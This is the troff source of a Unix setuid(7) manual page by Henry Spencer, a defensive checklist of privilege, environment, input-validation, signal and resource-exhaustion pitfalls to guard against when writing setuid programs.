...nr x \\w'\(sq'u+1n
...TP \\nxu
\(sq
....
...P
The program should run with the weakest userid possible, preferably
one used only by itself.
A security hole in a setuid program running with a highly-privileged
userid can compromise an entire system.
Security-critical programs like
...IR passwd (1)
should always have private userids, to minimize possible damage
from penetrations elsewhere.
...P
The result of
...I getlogin
or
...I ttyname
may be wrong if the descriptors have been meddled with.
There is
...I no
foolproof way to determine the controlling terminal
or the login name (as opposed to uid) on V7.
...P
On some systems (not ours), the setuid bit may not be honored if
the program is run by
...IR root ,
so the program may find itself running as
...IR root .
...P
Programs that attempt to use
...I creat
for locking can foul up when run by
...IR root ;
use of
...I link
is preferred when implementing locking.
Using
...I chmod
for locking is an obvious disaster.
...P
Breaking an existing lock is very dangerous; the breakdown of a locking
protocol may be symptomatic of far worse problems.
Doing so on the basis of the lock being `old' is sometimes necessary,
but programs can run for surprising lengths of time on heavily-loaded
systems.
...P
Care must be taken that user requests for i/o are checked for
permissions using the user's permissions, not the program's.
Use of
...I access
is recommended.
...P
Programs executed at user request (e.g. shell escapes) must
not receive the setuid program's permissions;
use of daughter processes and
...I setuid(getuid())
plus
...I setgid(getgid())
after
...I fork
but before
...I exec
is vital.
...P
Similarly, programs executed at user request must not receive other
sensitive resources, notably file descriptors.
Use of
...IR closeall (3)
or close-on-exec arrangements,
on systems which have them,
is recommended.
...P
Programs activated by one user but handling traffic on behalf of
others (e.g. daemons) should avoid doing
...IR setuid(getuid())
or
...IR setgid(getgid()) ,
since the original invoker's identity is almost certainly inappropriate.
On systems which permit it, use of
...I setuid(geteuid())
and
...I setgid(getegid())
is recommended when performing work on behalf of the system as
opposed to a specific user.
...P
There are inherent permission problems when a setuid program executes
another setuid program,
since the permissions are not additive.
Care should be taken that created files are not owned by the wrong person.
Use of
...I setuid(geteuid())
and its gid counterpart can help, if the system allows them.
...P
Care should be taken that newly-created files do not have the wrong
permission or ownership even momentarily.
Permissions should be arranged by using
...I umask
in advance, rather than by creating the file wide-open and then using
...IR chmod .
Ownership can get sticky due to the limitations of the setuid concept,
although using a daughter process connected by a pipe can help.
...P
Setuid programs should be especially careful about error checking,
and the normal response to a strange situation should be termination,
rather than an attempt to carry on.
...PP
The following are ways in which the program may be induced to carelessly
give away its special privileges.
...P
The directory the program is started in, or directories it may
plausibly
...I chdir
to, may contain programs with the same names as system programs,
placed there in hopes that the program will activate a shell with
a permissive
...B PATH
setting.
...B PATH
should \fIalways\fR be standardized before invoking a shell
(either directly or via
...I popen
or
...IR execvp/execlp ).
...P
Similarly, a bizarre
...B IFS
setting may alter the interpretation of a shell command in really
strange ways, possibly causing a user-supplied program to be invoked.
...B IFS
too should always be standardized before invoking a shell.
(Our shell does this automatically.)
...P
Environment variables in general cannot be trusted.
Their contents should never be taken for granted.
...P
Setuid shell files (on systems which implement such) simply cannot
cope adequately with some of these problems.
They also have some nasty problems like trying to run a
...I \&.profile
when run under a suitable name.
They are terminally insecure, and must be avoided.
...P
Relying on the contents of files placed in publically-writeable
directories, such as
...IR /tmp ,
is a nearly-incurable security problem.
Setuid programs should avoid using
...I /tmp
entirely, if humanly possible.
The sticky-directories modification (sticky bit on for a directory means
only owner of a file can remove it) (we have this feature) helps,
but is not a complete solution.
...P
A related problem is that
spool directories, holding information that the program will trust
later, must never be publically writeable even if the files in the
directory are protected.
Among other sinister manipulations that can be performed, note that
on many Unixes (not ours), a core dump of a setuid program is owned
by the program's owner and not by the user running it.
...PP
The following are unusual but possible error conditions that the
program should cope with properly (resource-exhaustion questions
are considered separately, see below).
...P
The value of
...I argc
might be 0.
...P
The setting of the
...I umask
might not be sensible.
In any case, it should be standardized when creating files
not intended to be owned by the user.
...P
One or more of the standard descriptors might be closed, so that
an opened file might get (say) descriptor 1, causing chaos if the
program tries to do a
...IR printf .
...P
The current directory (or any of its parents)
may be unreadable and unsearchable.
On many systems
...IR pwd (1)
does not run setuid-root,
so it can fail under such conditions.
...P
Descriptors shared by other processes (i.e., any that are open
on startup) may be manipulated in strange ways by said processes.
...P
The standard descriptors may refer to a terminal which has a bizarre
mode setting, or which cannot be opened again,
or which gives end-of-file on any read attempt, or which cannot
be read or written successfully.
...P
The process may be hit by interrupt, quit, hangup, or broken-pipe signals,
singly or in fast succession.
The user may deliberately exploit the race conditions inherent
in catching signals;
ignoring signals is safe, but catching them is not.
...P
Although non-keyboard signals cannot be sent by ordinary users in V7,
they may perhaps be sent by the system authorities (e.g. to
indicate that the system is about to shut down),
so the possibility cannot be ignored.
...P
On some systems (not ours)
there may be an
...I alarm
signal pending on startup.
...P
The program may have children it did not create.
This is normal when the process is part of a pipeline.
...P
In some non-V7 systems, users can change the ownerships of their files.
Setuid programs should avoid trusting the owner identification of a file.
...P
User-supplied arguments and input data
...I must
be checked meticulously.
Overly-long input stored in an array without proper bound checking
can easily breach security.
When software depends on a file being in a specific format, user-supplied
data should never be inserted into the file without being checked first.
Meticulous checking includes allowing for the possibility of non-ASCII
characters.
...P
Temporary files left in public directories
like
...I /tmp
might vanish at inconvenient times.
...PP
The following are resource-exhaustion possibilities that the
program should respond properly to.
...P
The user might have used up all of his allowed processes, so
any attempt to create a new one (via
...I fork
or
...IR popen )
will fail.
...P
There might be many files open, exhausting the supply of descriptors.
Running
...IR closeall (3),
on systems which have it,
is recommended.
...P
There might be many arguments.
...P
The arguments and the environment together might occupy a great deal
of space.
...PP
Systems which impose other resource limitations can open setuid
programs to similar resource-exhaustion attacks.
...PP
Setuid programs which execute ordinary programs without reducing
authority pass all the above problems on to such unprepared children.
Standardizing the execution environment is only a partial solution.
...SH SEE ALSO
closeall(3), standard(3)
...SH HISTORY
Locally written, although based on outside contributions.
...SH AUTHOR
Henry Spencer <henry@zoo.toronto.edu> ...SH BUGS
The list really is rather long...
and probably incomplete.
...PP
Neither the author nor the University of Toronto accepts any responsibility
whatever for the use or non-use of this information.
-->

</book>